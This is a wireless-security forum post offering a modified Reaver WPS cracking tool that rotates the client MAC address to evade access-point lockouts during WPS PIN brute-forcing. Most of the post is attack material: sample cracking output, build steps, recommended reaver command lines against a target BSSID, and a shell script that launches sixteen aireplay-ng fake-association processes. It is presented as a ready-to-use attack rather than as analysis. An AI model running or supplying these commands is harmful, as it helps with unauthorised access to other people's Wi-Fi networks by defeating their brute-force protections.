ReaverWPS with MAC Changer 1.0

Modified version with MAC Address last character changer to speed up the attack

Watchers:
This resource is being watched by 155 members.
  1. Mr. Penguin
    REAVER WPS modified version with MAC Address last character changer to speed up the attack.
    Well, some times the AP will reject the "EAPOL Request" after a success pin try. I made some tests with simultaneous reaver instances running with different MACs (the -m argument), and when one instance gets "WARNING: Receive timeout occurred", the other gets "Received identity request" and continue the cracking.

    The problem of this method is: The reaver tool doesn't support simultaneous instances (ok, I read the FAQ about it). If you run two reaver instances, by example, the two instances will try the same pin at the same time.

    Changes on the reaver source code. Look the output:
    Code:
    Select All
    [+] Using MAC BC:99:47:B7:03:E9 [+] Trying pin 00485678 [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M3 message [+] Sending M4 message [+] Received M3 message [+] Received M3 message [+] Received WSC NACK [+] Sending WSC NACK [+] Using MAC BC:99:47:B7:03:E8 [+] Trying pin 00495677 [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M3 message [+] Sending M4 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received WSC NACK [+] Sending WSC NACK [+] Using MAC BC:99:47:B7:03:E7 [+] Trying pin 00505673 ...
    On the first try, reaver is using the client MAC "BC:99:47:B7:03:E9" (it is not a real MAC, I'm just using for the example), on the second, "BC:99:47:B7:03:E8", on the third, "BC:99:47:B7:03:E7". Well, after the use of the MAC "BC:99:47:B7:03:E0", reaver will start again on "BC:99:47:B7:03:E9".

    The numbers:
    With this method: (13 seconds/pin) Without this method: (31 seconds/pin)
    How to install

    Extract the tarball
    Code:
    Select All
    tar -xzvf reaver-1.4-mac-changer.tar.gz
    Install Required Libraries and Tools
    Code:
    Select All
    sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
    Build Reaver
    Code:
    Select All
    cd reaver-1.4-mac-changer cd src ./configure make
    Install Reaver
    Code:
    Select All
    sudo make install
    How to use

    Code:
    Select All
    reaver -i mon0 -b AA:BB:CC:DD:EE:FF -M
    or
    Code:
    Select All
    reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer
    What I recommend:
    Code:
    Select All
    reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer --no-nacks --win7 --no-associate -vv
    To associate more effectively, I recommend to use aireplay-ng tool. Create a "associate.sh" file, and put this inside:
    Code:
    Select All
    aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZF & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZE & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZD & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZC & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZB & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZA & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z9 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z8 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z7 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z6 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z5 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z4 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z3 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z2 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z1 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z0 &
    PS: Change AA:BB:CC:DD:EE:FF to the BSSID and ZZ:ZZ:ZZ:ZZ:ZZ:Z to your MAC (without the last digit).

    Before using reaver tool, just type "sh associate.sh". To kill all the aireplay-ng, type "killall aireplay-ng".

    If you have success using this method, please, share with us to improve more and more the reaver WPS.
  • About Us

    We are a community mixed with professionals and beginners with an interest in wireless security, auditing and pentesting. Feel free to check out and upload resources.


    You can also find us on: Twitter and Facebook

  • Donate to Us

    Did you find our forums useful? Feel free to donate Bitcoin to us using the form below. Those who donate the equivlent of $10 USD or more will be upgraded to VIP membership. Don't have Bitcoin? Use your credit card to GO VIP here. Don't want to fork out some coin? There are other ways to GO VIP. Bitcoin: 1LMTGSoTyJWXuy2mQkHfgMzD7ez74x1Z8K